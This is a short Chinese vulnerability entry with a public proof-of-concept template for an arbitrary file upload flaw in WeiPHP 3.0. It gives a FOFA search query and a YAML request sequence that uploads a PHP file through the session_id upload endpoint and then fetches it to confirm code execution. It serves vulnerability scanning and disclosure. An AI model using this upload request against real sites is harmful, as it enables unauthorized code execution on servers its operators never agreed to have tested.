漏洞描述
WeiPHP3.0 session_id 存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件。漏洞影响:WeiPHP3.0
fofa-query: app="weiphp"
weiphp3-sessionid-fileupload: WeiPHP3.0 session_id 任意文件上传漏洞
PoC代码[已公开]
id: weiphp3-sessionid-fileupload
info:
name: WeiPHP3.0 session_id 任意文件上传漏洞
author: daffainfo
severity: critical
verified: true
description: |
WeiPHP3.0 session_id 存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件。漏洞影响:WeiPHP3.0
fofa-query: app="weiphp"
reference:
- https://github.com/Threekiii/Awesome-POC/blob/master/CMS%E6%BC%8F%E6%B4%9E/WeiPHP3.0%20session_id%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md
set:
randstr: randomLowercase(4)
md5str: md5(randstr)
file: year(0) + "-" + month(0) + "-" + day(0)
rboundary: randomLowercase(8)
rules:
r0:
request:
method: POST
path: /index.php?s=/Home/File/upload/session_id/scevs8hub3m5ogla05a421hb42.html
headers:
Content-Type: multipart/form-data; boundary=------------------------WebKitFormBoundary{{rboundary}}
body: "\
--------------------------WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"download\"; filename=\"882176.php\"\r\n\
Content-Type: application/octet-stream\r\n\
\r\n\
<?php\r\n\
print(\"{{md5str}}\");\r\n\
\r\n\
--------------------------WebKitFormBoundary{{rboundary}}--\r\n\
"
expression: response.status == 200 && response.body.bcontains(b'"status":1')
output:
search: '"\"savename\":\"(?P<phpname>.+?).php".bsubmatch(response.body)'
phpname: search["phpname"]
r1:
request:
method: GET
path: /Uploads/Download/{{file}}/{{phpname}}.php
expression: response.status == 200 && response.body.bcontains(bytes(md5str))
expression: r0() && r1()